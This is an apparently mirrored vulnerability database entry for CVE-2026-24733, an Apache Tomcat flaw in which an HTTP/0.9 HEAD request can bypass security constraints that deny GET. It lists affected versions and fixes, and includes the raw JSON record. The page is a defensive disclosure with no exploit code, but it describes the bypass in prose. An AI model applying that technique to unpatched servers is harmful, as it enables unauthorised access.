FKIE_CVE-2026-24733

Vulnerability from fkie_nvd - Published: 2026-02-17 19:21 - Updated: 2026-02-18 17:51
Severity ?
Summary
Improper Input Validation vulnerability in Apache Tomcat. Tomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification invalid) HEAD request using HTTP/0.9. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0.M1 through 9.0.112. Older, EOL versions are also affected. Users are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue.
References
security@apache.orghttps://lists.apache.org/thread/6xk3t65qpn1myp618krtfotbjn1qt90f
Impacted products
Vendor Product Version
To clipboard 

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Improper Input Validation vulnerability in Apache Tomcat.\n\n\nTomcat did not limit HTTP/0.9 requests to the GET method. If a security \nconstraint was configured to allow HEAD requests to a URI but deny GET \nrequests, the user could bypass that constraint on GET requests by \nsending a (specification invalid) HEAD request using HTTP/0.9.\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0.M1 through 9.0.112.\n\n\nOlder, EOL versions are also affected.\n\nUsers are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue."
    },
    {
      "lang": "es",
      "value": "Vulnerabilidad de validaci\u00f3n de entrada inadecuada en Apache Tomcat.\n\nTomcat no limitaba las solicitudes HTTP/0.9 al m\u00e9todo GET. Si una restricci\u00f3n de seguridad estaba configurada para permitir solicitudes HEAD a una URI pero denegar solicitudes GET, el usuario pod\u00eda eludir esa restricci\u00f3n en las solicitudes GET enviando una solicitud HEAD (inv\u00e1lida seg\u00fan la especificaci\u00f3n) usando HTTP/0.9.\n\nEste problema afecta a Apache Tomcat: desde 11.0.0-M1 hasta 11.0.14, desde 10.1.0-M1 hasta 10.1.49, desde 9.0.0.M1 hasta 9.0.112.\n\nLas versiones m\u00e1s antiguas, EOL, tambi\u00e9n est\u00e1n afectadas.\n\nSe recomienda a los usuarios actualizar a la versi\u00f3n 11.0.15 o posterior, 10.1.50 o posterior o 9.0.113 o posterior, lo que soluciona el problema."
    }
  ],
  "id": "CVE-2026-24733",
  "lastModified": "2026-02-18T17:51:53.510",
  "metrics": {},
  "published": "2026-02-17T19:21:56.820",
  "references": [
    {
      "source": "security@apache.org",
      "url": "https://lists.apache.org/thread/6xk3t65qpn1myp618krtfotbjn1qt90f"
    }
  ],
  "sourceIdentifier": "security@apache.org",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "security@apache.org",
      "type": "Primary"
    }
  ]
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.